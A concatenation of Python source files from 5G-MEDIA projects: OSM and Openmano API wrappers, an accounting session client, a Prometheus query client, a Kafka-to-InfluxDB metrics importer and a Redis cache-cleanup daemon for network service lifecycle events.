elif response.status_code in [HTTP_401_UNAUTHORIZED, HTTP_403_FORBIDDEN]:
logger.warning('Token has expired and open_ns_sesion failed; retrying')
return self.open_session_retrial(url, payload)
def open_vnf_session(self, ns_session_id, vnf_uuid, vnf_name):
"""Open a Virtual Network Function (VNF) Session.
Args:
ns_session_id (int): The id of the NS session where the VNF belongs
vnf_uuid (str): The UUID of the VNF
vnf_name (str): The name of the VNF
Returns:
vnf_session_id (int): The ID of the opened VNF session
"""
url = BASE_URL + '/openVnfSession'
payload = {
'timestamp_sec': time(),
'ns_session_id': ns_session_id,
'vnf_id': vnf_uuid,
'vnf_name': vnf_name
}
logger.info('Attempting to open vnf session with payload {}'.format(payload))
response = self.__client.post(url=url, headers=self.__headers, payload=json.dumps(payload))
logger.debug('Open vnf session response: {}, Status code: {}'.format(response.text, response.status_code))
if response.status_code == HTTP_200_OK:
vnf_session_id = int(response.text)
logger.info('Opened vnf session with id {}'.format(vnf_session_id))
return vnf_session_id
elif response.status_code in [HTTP_401_UNAUTHORIZED, HTTP_403_FORBIDDEN]:
logger.warning('Token has expired and open_vnf_sesion failed; retrying')
return self.open_session_retrial(url, payload)
def open_vdu_session(self, vnf_session_id, vdu):
"""Open a Virtual Deployment Unit (VDU) session.
Args:
vnf_session_id (int): The id of the VNF session where the VDU belongs.
vdu (obj): A VDU object
Returns:
vdu_session_id (int): The VDU session id.
"""
url = BASE_URL + '/openVduSession'
payload = {
'timestamp_sec': time(),
'flavorCpuCount': vdu.vcpu,
'flavorDiskGb': vdu.vdisk,
'flavorMemoryMb': vdu.vram,
'nfvipop_id': vdu.nfvipop_id,
'vdu_id': vdu.uuid,
'vdu_type': 'FAAS_VNF' if 'faas' in vdu.nfvipop_id.lower() else 'PLAIN_VNF',
'vnf_session_id': vnf_session_id
}
logger.info('Attempting to open vdu session with payload {}'.format(payload))
response = self.__client.post(url=url, headers=self.__headers, payload=json.dumps(payload))
logger.debug('Open vdu session response: {}, Status code: {}'.format(response.text, response.status_code))
if response.status_code == HTTP_200_OK:
vdu_session_id = int(response.text)
logger.info('Opened vdu session with id {}'.format(vdu_session_id))
return vdu_session_id
elif response.status_code in [HTTP_401_UNAUTHORIZED, HTTP_403_FORBIDDEN]:
logger.warning('Token has expired and open_vdu_sesion failed; retrying')
return self.open_session_retrial(url, payload)
def log_vdu_consumption(self, metric_type, metric_value, vdu_session_id):
"""Send measurement of VDU consumption for logging.
Args:
metric_type (str): The type of metric
metric_value (double): The value of metric
vdu_session_id (int): The id of the VDU session that the metric refers to
"""
url = BASE_URL + '/logVduConsumption'
payload = {
'timestamp': time(),
'consumption_type': metric_type,
'consumption_value': metric_value,
'vdu_session_id': vdu_session_id
}
logger.info('Sending vdu consumption with payload {}'.format(payload))
response = self.__client.post(url=url, headers=self.__headers, payload=json.dumps(payload))
logger.debug('Log vdu consumption response: {}, Status code: {}'.format(response.text, response.status_code))
if response.status_code == HTTP_200_OK:
logger.info('Vdu consumption logged successfully')
return
elif response.status_code in [HTTP_401_UNAUTHORIZED, HTTP_403_FORBIDDEN]:
logger.warning('Token has expired and log_vdu_consumption failed; retrying')
self.login()
response = self.__client.post(url=url, headers=self.__headers, payload=json.dumps(payload))
if response.status_code == HTTP_200_OK:
logger.info('Vdu consumption logged successfully')
return json.loads(response.text)['id']
def close_session_retrial(self, url, payload):
"""Retry closing a session after the authorization token has expired.
Args:
url (str): The url of the API call
payload (dict): The payload to send to the API call
"""
self.login()
response = self.__client.post(url=url, headers=self.__headers, payload=json.dumps(payload))
if response.status_code == HTTP_200_OK:
logger.warning('Session was closed')
return
return
def close_session(self, session_id, session_type):
"""Close a NS, VNF or VDU session.
Args:
session_id (int): The ID of the session
session_type (str): The type of the session
"""
url = BASE_URL + CLOSE_SESSIONS[session_type]
payload = {'id': session_id}
logger.info('Closing {} session with id {}'.format(session_type, session_id))
response = self.__client.post(url=url, headers=self.__headers, payload=json.dumps(payload))
logger.debug('Close {} session response: {}, Status code: {}'.format(session_type, response.text,
response.status_code))
if response.status_code == HTTP_200_OK:
logger.info('Successfully closed {} session'.format(session_type))
return
elif response.status_code in [HTTP_401_UNAUTHORIZED, HTTP_403_FORBIDDEN]:
logger.warning('Token has expired and close_session failed; retrying')
self.close_session_retrial(url, payload)
accounting_client = AccountingClient()
```
#### File: accounting-agent/nbiapi/nsilcm.py
```python
import logging.config
from django.conf import settings
from httpclient.client import Client
logging.config.dictConfig(settings.LOGGING)
logger = logging.getLogger(__name__)
class NsiLcm(object):
"""NSI LCM Class.
This class serves as a wrapper for the Network Slice Instance Lifecycle Management (NSILCM) part
of the Northbound Interface (NBI) offered by OSM. The methods defined in this class help
retrieve the NSI-related entities of OSM, and instantiate or terminate an NSI.
Attributes:
bearer_token (str): The OSM Authorization Token
Args:
token (str): The OSM Authorization Token
"""
def __init__(self, token):
"""NSI LCM Class Constructor."""
self.__client = Client(verify_ssl_cert=False)
self.bearer_token = token
def get_netslice_list(self):
"""Fetch a list of all Netslice Instances
Returns:
nsi_list_obj (Response): A list of Netslice Instances as a requests object
Examples:
>>> from django.conf import settings
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.nsilcm import NsiLcm
>>> token = bearer_token(settings.OSM_ADMIN_CREDENTIALS.get('username'), settings.OSM_ADMIN_CREDENTIALS.get('password'))
>>> nsilcm = NsiLcm(token)
>>> nsi_list_obj = nsilcm.get_netslice_list()
OSM Cli:
$ osm nsi-list
"""
endpoint = '{}/osm/nsilcm/v1/netslice_instances'.format(settings.OSM_COMPONENTS.get('NBI-API'))
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
response = self.__client.get(endpoint, headers)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
.format(response.url, response.status_code, response.headers, response.text))
return response
def get_netslice(self, nsi_uuid):
"""Fetch details of a specific Netslice Instance
Args:
nsi_uuid (str): The UUID of the NS to fetch details for
Returns:
nsi_obj (Response): A NS as a requests object
Examples:
>>> from django.conf import settings
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.nsilcm import NsiLcm
>>> token = bearer_token(settings.OSM_ADMIN_CREDENTIALS.get('username'), settings.OSM_ADMIN_CREDENTIALS.get('password'))
>>> nsilcm = NsiLcm(token)
>>> nsi_obj = nsilcm.get_netslice('07048175-660b-404f-bbc9-5be7581e74de')
OSM Cli:
$ osm nsi-show 07048175-660b-404f-bbc9-5be7581e74de
"""
endpoint = '{}/osm/nsilcm/v1/netslice_instances/{}'.format(settings.OSM_COMPONENTS.get('NBI-API'), nsi_uuid)
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
response = self.__client.get(endpoint, headers)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
.format(response.url, response.status_code, response.headers, response.text))
return response
```
#### File: accounting-agent/nbiapi/nslcm.py
```python
import logging.config
from django.conf import settings
from requests import Response
from httpclient.client import Client
logging.config.dictConfig(settings.LOGGING)
logger = logging.getLogger(__name__)
class NsLcm(object):
"""NS LCM Class.
This class serves as a wrapper for the Network Service Lifecycle Management (NSLCM) part
of the Northbound Interface (NBI) offered by OSM. The methods defined in this class help
retrieve the NS-related entities of OSM, i.e. NS and VNFs or terminate an NS instance.
Attributes:
bearer_token (str): The OSM Authorization Token
Args:
token (str): The OSM Authorization Token
"""
def __init__(self, token):
"""NS LCM Class Constructor."""
self.__client = Client(verify_ssl_cert=False)
self.bearer_token = token
def get_ns_list(self):
"""Fetch a list of all NS Instances
Returns:
ns_list_obj (Response): A list of NSs as a requests object
Examples:
>>> from django.conf import settings
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.nslcm import NsLcm
>>> token = bearer_token(settings.OSM_ADMIN_CREDENTIALS.get('username'), settings.OSM_ADMIN_CREDENTIALS.get('password'))
>>> nslcm = NsLcm(token)
>>> ns_list_obj = nslcm.get_ns_list()
OSM Cli:
$ osm ns-list
"""
endpoint = '{}/osm/nslcm/v1/ns_instances'.format(settings.OSM_COMPONENTS.get('NBI-API'))
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
response = self.__client.get(endpoint, headers)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
.format(response.url, response.status_code, response.headers, response.text))
return response
def get_ns(self, ns_uuid):
"""Fetch details of a specific NS Instance
Args:
ns_uuid (str): The UUID of the NS to fetch details for
Returns:
ns_obj (Response): A NS as a requests object
Examples:
>>> from django.conf import settings
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.nslcm import NsLcm
>>> token = bearer_token(settings.OSM_ADMIN_CREDENTIALS.get('username'), settings.OSM_ADMIN_CREDENTIALS.get('password'))
>>> nslcm = NsLcm(token)
>>> ns_obj = nslcm.get_ns('07048175-660b-404f-bbc9-5be7581e74de')
OSM Cli:
$ osm ns-show 07048175-660b-404f-bbc9-5be7581e74de
"""
endpoint = '{}/osm/nslcm/v1/ns_instances/{}'.format(settings.OSM_COMPONENTS.get('NBI-API'), ns_uuid)
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
response = self.__client.get(endpoint, headers)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
.format(response.url, response.status_code, response.headers, response.text))
return response
def terminate_ns(self, ns_uuid):
"""Terminate a NS Instance.
Args:
ns_uuid (str): The UUID of the NS to terminate
Returns:
response (Response): A requests object
Examples:
>>> from django.conf import settings
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.nslcm import NsLcm
>>> token = bearer_token(settings.OSM_ADMIN_CREDENTIALS.get('username'), settings.OSM_ADMIN_CREDENTIALS.get('password'))
>>> nslcm = NsLcm(token)
>>> response = nslcm.terminate_ns('07048175-660b-4<PASSWORD>')
"""
endpoint = '{}/osm/nslcm/v1/ns_instances/{}/terminate'.format(settings.OSM_COMPONENTS.get('NBI-API'), ns_uuid)
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
response = self.__client.post(endpoint, headers)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
.format(response.url, response.status_code, response.headers, response.text))
return response
def get_vnf_list(self):
"""Fetch a list of all VNFs.
Returns:
vnf_list_obj (Response): A list of VNFs as a requests object
Examples:
>>> from django.conf import settings
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.nslcm import NsLcm
>>> token = bearer_token(settings.OSM_ADMIN_CREDENTIALS.get('username'), settings.OSM_ADMIN_CREDENTIALS.get('password'))
>>> nslcm = NsLcm(token)
>>> vnf_list_obj = nslcm.get_vnf_list()
OSM Cli:
$ osm vnf-list
"""
endpoint = '{}/osm/nslcm/v1/vnf_instances'.format(settings.OSM_COMPONENTS.get('NBI-API'))
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
response = self.__client.get(endpoint, headers)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
.format(response.url, response.status_code, response.headers, response.text))
return response
def get_vnf(self, vnf_uuid):
"""Fetch details of a specific VNF
Args:
vnf_uuid (str): The UUID of the VNF to fetch details for
Returns:
vnf_obj (Response): A VNF as a requests object
Examples:
>>> from django.conf import settings
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.nslcm import NsLcm
>>> token = bearer_token(settings.OSM_ADMIN_CREDENTIALS.get('username'), settings.OSM_ADMIN_CREDENTIALS.get('password'))
>>> nslcm = NsLcm(token)
>>> vnf_obj = nslcm.get_vnf('a5f506e9-45c7-42fd-b12d-b5c657ed87fb')
OSM Cli:
$ osm vnf-show a5f506e9-45c7-42fd-b12d-b5c657ed87fb
"""
endpoint = '{}/osm/nslcm/v1/vnf_instances/{}'.format(settings.OSM_COMPONENTS.get('NBI-API'), vnf_uuid)
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
response = self.__client.get(endpoint, headers)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
.format(response.url, response.status_code, response.headers, response.text))
return response
def get_vnf_list_by_ns(self, ns_uuid):
"""Fetch list of VNFs for specific NS Instance.
Args:
ns_uuid (str): The UUID of the NS to fetch VNFs for.
Returns:
vnf_list_obj (Response): A list of VNFs as a requests object.
Examples:
>>> from django.conf import settings
>>> from nbiapi.identity import bearer_token
>>> from nbiapi.nslcm import NsLcm
>>> token = bearer_token(settings.OSM_ADMIN_CREDENTIALS.get('username'), settings.OSM_ADMIN_CREDENTIALS.get('password'))
>>> nslcm = NsLcm(token)
>>> vnf_list_obj = nslcm.get_vnf('a5f506e9-45c7-42fd-b12d-b5c657ed87fb')
"""
endpoint = '{}/osm/nslcm/v1/vnf_instances?nsr-id-ref={}'.format(settings.OSM_COMPONENTS.get('NBI-API'), ns_uuid)
headers = {"Authorization": "Bearer {}".format(self.bearer_token), "Accept": "application/json"}
response = self.__client.get(endpoint, headers)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
.format(response.url, response.status_code, response.headers, response.text))
return response
```
#### File: accounting-agent/openmanoapi/datacenters.py
```python
import logging
from httpclient.client import Client
from openmanoapi.config import BASE_URL
logger = logging.getLogger(__name__)
class Datacenter(object):
""" Class for Datacenter API
See more: https://osm.etsi.org/wikipub/index.php/RO_Northbound_Interface#Datacenters
"""
def __init__(self):
self.__client = Client(verify_ssl_cert=True)
def get_list(self, openmano_tenant_id, headers=None, query_params=None):
"""Fetch the list of Openmano datacenter entities by given tenant ID
Args:
openmano_tenant_id (str): The tenant UUID
headers (dict, optional): the required HTTP headers, e.g., Accept: application/json
query_params (dict, optional): Additional arguments will be passed to the request.
Returns:
obj: a requests object
Examples:
>>> from httpclient.client import Client
>>> from openmanoapi.datacenters import Datacenter
>>> dc = Datacenter()
>>> datacenters = dc.get_list('f35d06af-ed24-40ca-87c1-4e6ae81008b4')
>>> print(int(datacenters.status_code))
200
>>> print(datacenters.json())
{"datacenters": [{"vim_url": "http://192.168.1.194/identity/v2.0", "created_at": "2018-05-04T09:07:22", "type": "openstack", "uuid": "8e430688-4f7a-11e8-b3e2-00163edc3180", "name": "devstack-pike"} ] }
Openmano cli:
$ openmano datacenter-list -a --debug
"""
endpoint = '{}/{}/datacenters'.format(BASE_URL, openmano_tenant_id)
response = self.__client.get(endpoint, headers=headers, query_params=query_params)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
"".format(response.url, response.status_code, response.headers, response.text))
return response
def get(self, openmano_tenant_id, datacenter_id, headers=None, query_params=None):
"""Fetch details for an Openmano datacenter by given tenant ID and datacenter ID
Args:
openmano_tenant_id (str): The tenant UUID
datacenter_id (str): The datacenter UUID
headers (dict, optional): the required HTTP headers, e.g., Accept: application/json
query_params (dict, optional): Additional arguments will be passed to the request.
Returns:
obj: a requests object
Examples:
>>> from httpclient.client import Client
>>> from openmanoapi.datacenters import Datacenter
>>> dc = Datacenter()
>>> datacenters = dc.get('f35d06af-ed24-40ca-87c1-4e6ae81008b4', '8e430688-4f7a-11e8-b3e2-00163edc3180')
>>> print(int(datacenters.status_code))
200
>>> print(datacenters.json())
Openmano cli:
$ openmano datacenter-list {datacenter_id} -d
"""
endpoint = '{}/{}/datacenters/{}'.format(BASE_URL, openmano_tenant_id, datacenter_id)
response = self.__client.get(endpoint, headers=headers, query_params=query_params)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
"".format(response.url, response.status_code, response.headers, response.text))
return response
```
#### File: accounting-agent/openmanoapi/tenants.py
```python
import logging
from httpclient.client import Client
from openmanoapi.config import BASE_URL
logger = logging.getLogger(__name__)
class Tenant(object):
""" Class for Tenant API
See more: https://osm.etsi.org/wikipub/index.php/RO_Northbound_Interface#Tenants
"""
def __init__(self):
self.__client = Client(verify_ssl_cert=True)
def get_list(self, headers=None, query_params=None):
"""Fetch the list of Openmano tenants
Args:
headers (dict, optional): the required HTTP headers, e.g., Accept: application/json
query_params (dict, optional): Additional arguments will be passed to the request.
Returns:
obj: a requests object
Examples:
>>> from httpclient.client import Client
>>> from openmanoapi.tenants import Tenant
>>> tn = Tenant()
>>> tenants = tn.get_list()
>>> print(int(tenants.status_code))
200
>>> print(tenants.json())
{"tenants": [{"created_at": "2018-05-03T16:00:04", "description": null, "uuid": "f35d06af-ed24-40ca-87c1-4e6ae81008b4", "name": "osm"} ] }
Openmano cli:
$ openmano tenant-list -d
"""
endpoint = '{}/tenants'.format(BASE_URL)
response = self.__client.get(endpoint, headers=headers, query_params=query_params)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
"".format(response.url, response.status_code, response.headers, response.text))
return response
def get(self, openmano_tenant_id, headers=None, query_params=None):
"""Fetch details for an Openmano tenant by given tenant ID
Args:
openmano_tenant_id (str): The tenant UUID
headers (dict, optional): the required HTTP headers, e.g., Accept: application/json
query_params (dict, optional): Additional arguments will be passed to the request.
Returns:
obj: a requests object
Examples:
>>> from httpclient.client import Client
>>> from openmanoapi.tenants import Tenant
>>> tn = Tenant()
>>> tenant = tn.get('f35d06af-ed24-40ca-87c1-4e6ae81008b4')
>>> print(int(tenant.status_code))
200
>>> print(tenant.json())
Openmano cli:
$ openmano tenant-list {openmano_tenant_id} -d
"""
endpoint = '{}/tenants/{}'.format(BASE_URL, openmano_tenant_id)
response = self.__client.get(endpoint, headers=headers, query_params=query_params)
logger.debug("Request `GET {}` returns HTTP status `{}`, headers `{}` and body `{}`."
"".format(response.url, response.status_code, response.headers, response.text))
return response
``` |
{
"source": "5g-media/kubernetes-prometheus-publisher",
"score": 3
} |
#### File: prometheus_client/v1/query_range.py
```python
import logging.config
import urllib3
from httpclient.client import Client
from settings import PROMETHEUS, LOGGING
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
logging.config.dictConfig(LOGGING)
logger = logging.getLogger("publisher")
class QueryRange(object):
"""QueryRange Class.
Attributes:
bearer_token (str, optional): The Prometheus Authorization Token (if any)
Methods:
get(query, from_time, to_time, step): perform a query_range request in Prometheus API
"""
def __init__(self, token=None):
"""Class Constructor."""
self.__client = Client(verify_ssl_cert=False)
self.bearer_token = token
def get(self, query, from_time, to_time, step=14):
""" Perform a query_range request in Prometheus API (PromQL)
Args:
query (str): The query
from_time (str): The start datetime
to_time (str): The end datetime
step (int): The used step in the query. Default value is 14 secs.
Returns:
object: A list of NSs as a requests object
"""
endpoint = 'http://{}:{}/api/v1/query_range'.format(PROMETHEUS.get('HOST'),
PROMETHEUS.get('PORT'))
headers = {"Accept": "application/json"}
endpoint += "?query={}&start={}&end={}&step={}".format(query, from_time, to_time, step)
logger.debug("Prometheus web service: {}".format(endpoint))
response = self.__client.get(url=endpoint, headers=headers)
return response
``` |
{
"source": "5g-media/mape-data-importer",
"score": 4
} |
#### File: 5g-media/mape-data-importer/utils.py
```python
from datetime import datetime
from exceptions import *
def convert_str_to_datetime_timestamp(timestamp_str):
"""Convert a timestamp from str type to datetime object.
Args:
timestamp_str (str): The timestamp of the monitoring metric
Returns:
Object: The timestamp as datetime object
"""
formatter = '%Y-%m-%dT%H:%M:%S.%f'
if not isinstance(timestamp_str, str):
raise InvalidStrTimestamp("The type of the timestamp `{}` is not str".format(timestamp_str))
return datetime.strptime(timestamp_str, formatter)
def convert_utc_timestamp_to_unixtime_ms(timestamp_obj):
"""Convert a timestamp from datetime object to unix-time.
Args:
timestamp_obj (Object): The timestamp as datetime object
Returns:
int: The timestamp as unix-time (in microseconds)
"""
if not isinstance(timestamp_obj, datetime):
raise NotValidDatetimeTimestamp("The type of the timestamp `{}` is not datetime object".format(timestamp_obj))
unixtime_ms = timestamp_obj.timestamp() * pow(10, 6)
return unixtime_ms
def format_str_timestamp(timestamp_str):
"""Format a str timestamp adding teh char `Z` in the end of it, if needed
For instance: the '2014-12-10T12:00:00.123123' is converted to '2014-12-10T12:00:00.123123Z'.
Args:
timestamp_str (str): The timestamp of the monitoring metric
Returns:
str: The timestamp as datetime object
"""
if not timestamp_str.endswith('Z'):
return "{}Z".format(timestamp_str)
return timestamp_str
```
#### File: 5g-media/mape-data-importer/vce_worker.py
```python
import json
import logging.config
from kafka import KafkaConsumer
from datetime import datetime
from influxdb import InfluxDBClient
from utils import format_str_timestamp
from metric_formatter import format_monitoring_metric_per_source_origin
from exceptions import InvalidStrTimestamp, NotValidDatetimeTimestamp, MetricNameNotFound, \
MetricValueNotFound, \
VimUuidTypeNotSupported, VimTypeNotFound, NsUuidNotFound, NsdUuidNotFound, VnfUuidNotFound, \
VnfdUuidNotFound, \
VduUuidNotFound
from settings import KAFKA_SERVER, KAFKA_CLIENT_ID, KAFKA_API_VERSION, KAFKA_VCE_TOPIC, LOGGING, \
INFLUX_DATABASES, INFLUX_RETENTION_POLICY, KAFKA_VCE_GROUP_ID
logging.config.dictConfig(LOGGING)
logger = logging.getLogger(__name__)
def init_kafka_consumer():
# See more: https://kafka-python.readthedocs.io/en/master/apidoc/KafkaConsumer.html
consumer = KafkaConsumer(bootstrap_servers=KAFKA_SERVER, client_id=KAFKA_CLIENT_ID,
enable_auto_commit=True,
api_version=KAFKA_API_VERSION, group_id=KAFKA_VCE_GROUP_ID)
return consumer
def init_influx_client():
# See more: http://influxdb-python.readthedocs.io/en/latest/examples.html
influx_client = InfluxDBClient(host=INFLUX_DATABASES['default']['HOST'],
port=INFLUX_DATABASES['default']['PORT'],
username=INFLUX_DATABASES['default']['USERNAME'],
password=INFLUX_DATABASES['default']['PASSWORD'],
database=INFLUX_DATABASES['default']['NAME'], )
return influx_client
def main():
consumer = init_kafka_consumer()
consumer.subscribe(pattern=KAFKA_VCE_TOPIC)
influx_client = init_influx_client()
# Set retention policy in db
influx_client.create_retention_policy(name=INFLUX_RETENTION_POLICY['NAME'],
duration=INFLUX_RETENTION_POLICY['DURATION'],
replication=INFLUX_RETENTION_POLICY['REPLICATION'],
default=True)
# metric_x stands for the min bitrate of the selected Profile while the metric_y for the
# max bitrate of the seclected Profile
allowed_metrics = ['enc_speed', 'enc_dbl_time', 'gop_size', 'max_bitrate', 'num_frame',
'num_fps', 'enc_quality', 'act_bitrate', 'avg_bitrate', 'metric_x',
'metric_y', 'metric_z']
for msg in consumer:
try:
monitoring_metrics = list()
# Get & decode the message
message = json.loads(msg.value.decode('utf-8', 'ignore'))
# Format the given timestamp properly
unix_time = message['utc_time']
unix_ts = str(unix_time)[:10]
dt = datetime.utcfromtimestamp(float(unix_ts))
timestamp = dt.strftime('%Y-%m-%dT%H:%M:%S.%fZ')
for metric in message:
if metric not in allowed_metrics:
continue
try:
float(message[metric])
except:
continue
vdu_mac = message.get('id', None)
if vdu_mac is None:
continue
vdu_name = get_instance(vdu_mac)
if vdu_name is None:
continue
temp = {
"measurement": "vce_vnf_measurements",
"time": timestamp,
"tags": {
"metric": metric,
"vdu_mac": vdu_mac,
},
"fields": {
"value": float(message[metric]),
"vdu_name": vdu_name
}
}
monitoring_metrics.append(temp)
# Insert the record in the db
influx_client.write_points(monitoring_metrics)
except json.decoder.JSONDecodeError as je:
logger.warning("JSONDecodeError: {}".format(je))
except Exception as e:
logger.exception(e)
continue
def get_instance(index):
instances = {
'06:00:cc:74:72:95': 'vCE-1',
'06:00:cc:74:72:99': 'vCE-2'
}
if index in instances.keys():
return instances[index]
return None
if __name__ == '__main__':
main()
``` |
{
"source": "5g-media/mape-data-lcm",
"score": 2
} |
#### File: 5g-media/mape-data-lcm/daemon.py
```python
import redis
import json
import yaml
import logging.config
from kafka import KafkaConsumer
from influxdb import InfluxDBClient
from utils import convert_byte_to_str, get_vdus_info, compose_redis_key
from exceptions import NsValueIsNotDict, NsUuidDoesNotExist
from settings import KAFKA_SERVER, KAFKA_CLIENT_ID, KAFKA_API_VERSION, KAFKA_NS_MANAGER_TOPIC, INFLUX_DATABASES, \
REDIS_HOST, REDIS_PORT, REDIS_NFVI_DB, REDIS_EXPIRATION_SECONDS, LOGGING
logging.config.dictConfig(LOGGING)
logger = logging.getLogger(__name__)
def main():
# See more: https://kafka-python.readthedocs.io/en/master/apidoc/KafkaConsumer.html
consumer = KafkaConsumer(bootstrap_servers=KAFKA_SERVER, client_id=KAFKA_CLIENT_ID, enable_auto_commit=True,
value_deserializer=lambda v: yaml.safe_load(v.decode('utf-8', 'ignore')),
api_version=KAFKA_API_VERSION, )
consumer.subscribe(KAFKA_NS_MANAGER_TOPIC)
# See more: http://influxdb-python.readthedocs.io/en/latest/examples.html
influx_client = InfluxDBClient(host=INFLUX_DATABASES['default']['HOST'], port=INFLUX_DATABASES['default']['PORT'],
username=INFLUX_DATABASES['default']['USERNAME'],
password=INFLUX_DATABASES['default']['PASSWORD'],
database=INFLUX_DATABASES['default']['NAME'])
# See more: https://redis-py.readthedocs.io/en/latest/
redis_conn = redis.Redis(host=REDIS_HOST, port=REDIS_PORT, db=REDIS_NFVI_DB)
# Run each message in "ns" topic
for message in consumer:
logger.info(message)
message_key = convert_byte_to_str(message.key)
message_value = message.value
if message_key == "instantiate":
"""
An indicative sample of message is available in the file `samples/instantiate.json`.
Since the NS instantiation is still in progress, we skip this info.
"""
pass
elif message_key == "instantiated":
"""
When a new Network Service has successfully instantiated through OSM, a new entry is added in the Redis.
The Redis is used as a cache to avoid continuous requests in OSM-r4 NBI API in the translation process.
The translator could check if there is info in the redis related to the metric that is under process.
If there is (`hit` case), then no call in OSM r4 NBI API is needed. In `miss` case, the OSM will be used.
The key is a composition of <vim_name>:<vdu_uuid>. Use lower function in `vim_name`.
An indicative sample of message is available in the file `samples/instantiated.json`.
"""
pass
# # Get the operational state of the process
# ns_operation_state = message_value['operationState']
# if ns_operation_state != 'COMPLETED':
# continue
# ns_uuid = message_value.get('nsr_id', None)
#
# # Find the vdus for the new Network Service
# vdu_records = get_vdus_info(ns_uuid=ns_uuid)
#
# # Update the entries in the redis, if needed
# for vdu_record in vdu_records:
# vim_name = vdu_record.get("vim", {}).get('name', None)
# if vim_name is None:
# continue
#
# vdu_uuid = vdu_record.get("vdu", {}).get('id', None)
# if vdu_uuid is None:
# continue
#
# # Compose the redis key
# redis_key = compose_redis_key(vim_name, vdu_uuid)
#
# # Check if there is value for the given key. If no, insert a value. Otherwise, do nothing.
# existing_value = redis_conn.get(name=redis_key)
# if existing_value is None:
# redis_conn.set(name=redis_key, value=json.dumps(vdu_record), ex=REDIS_EXPIRATION_SECONDS)
# logger.info("[Redis] Add key: `{}` with value: `{}`".format(redis_key, vdu_record))
elif message_key == "terminate":
"""
In this step, the NS termination is still in progress. However, this the proper time to remove the entries
from redis since we can retrieve the vim information, since we can invoke the ns-instance web service.
An indicative sample of message is available in the file `samples/terminate.json`
"""
ns_uuid = message_value.get('nsInstanceId', None)
if ns_uuid is None:
continue
# Remove the entries related to the `ns_uuid` in Redis.
vdu_records = get_vdus_info(ns_uuid=ns_uuid)
for vdu_record in vdu_records:
vim_name = vdu_record.get("vim", {}).get('name', None)
if vim_name is None:
continue
vdu_uuid = vdu_record.get("vdu", {}).get('id', None)
if vdu_uuid is None:
continue
# Check if there are keys with the pattern: *:{vdu_uuid}.
# If yes, delete the relevant entry. Otherwise, do nothing.
vdu_keys = redis_conn.keys(pattern="*:{}".format(vdu_uuid))
vtranscoder_keys = redis_conn.keys(pattern="*_metrics:*")
spectator_keys = redis_conn.keys(pattern="spectators.vtranscoder3d.metrics:transcoder*")
matched_keys = vdu_keys + vtranscoder_keys + spectator_keys
for k in matched_keys:
existing_value = redis_conn.get(name=k)
if existing_value is not None:
redis_conn.delete(k)
logger.info("[Redis] Delete key: `{}`".format(k))
elif message_key == "terminated":
"""
When a new Network Service is terminated through OSM, delete the data from `InfluxDB` and the Redis.
The key is a composition of <vim_name>:<vdu_uuid>.
An indicative sample of message is available in the file `samples/terminated.json`
"""
# Get the operational state of the process
ns_operation_state = message_value['operationState']
if ns_operation_state != 'COMPLETED':
continue
# Delete the relevant redis entries
spectator_keys = redis_conn.keys(pattern="spectators.vtranscoder3d.metrics:transcoder*")
spectator_vnf_keys = redis_conn.keys(pattern="spectators.vtranscoder3d.metrics:vnf*")
matched_keys = spectator_keys + spectator_vnf_keys
for k in matched_keys:
existing_value = redis_conn.get(name=k)
if existing_value is not None:
redis_conn.delete(k)
logger.info("[Redis] Delete key: `{}`".format(k))
ns_uuid = message_value.get('nsr_id', None)
if ns_uuid is None:
continue
# # Remove the series with the "ns_uuid" tag from the Influxdb
# try:
# logger.info("[InfluxDB] Delete series with tag `ns_uuid`={}".format(ns_uuid))
# influx_client.delete_series(database=INFLUX_DATABASES['default']['NAME'], tags={'ns_uuid': ns_uuid})
# except (NsValueIsNotDict, NsUuidDoesNotExist, Exception) as exc:
# logger.exception(exc)
elif message_key == "action":
"Future usage"
pass
elif message_key == "show":
"Future usage"
pass
elif message_key == "deleted":
"Future usage"
pass
if __name__ == '__main__':
main()
``` |
{
"source": "5g-media/mape-executor",
"score": 2
} |
#### File: mape-executor/actions/utils.py
```python
from nbiapi.identity import bearer_token
from nbiapi.vnf import Vnf
from settings import OSM_ADMIN_CREDENTIALS
def get_vcdn_net_interfaces(ns_uuid, search_for_mid_cache="vCache-mid-vdu",
search_for_edge_cache="vCache-edge-vdu"):
""" Get the network interfaces of scaled VNF as well as the current count-index
Args:
ns_uuid (str): The NS uuid, in which the scaled VNF belongs to
search_for_mid_cache (str): Search for the Mid vCache by given explicit name
search_for_edge_cache (str): Search for scaled Edge vCache by given explicit name
Returns:
tuple(dict, int): The details of the VNF interfaces including the VDU index in the VNF
(
{
"edge": {
"user": {
"mac-address": "fa:16:3e:0c:94:7f",
"ip-address": "192.168.252.12",
"name": "ens6",
"ns-vld-id": "user"
},
"cache": {
"mac-address": "fa:16:3e:4d:b9:64",
"ip-address": "192.168.253.9",
"name": "ens7",
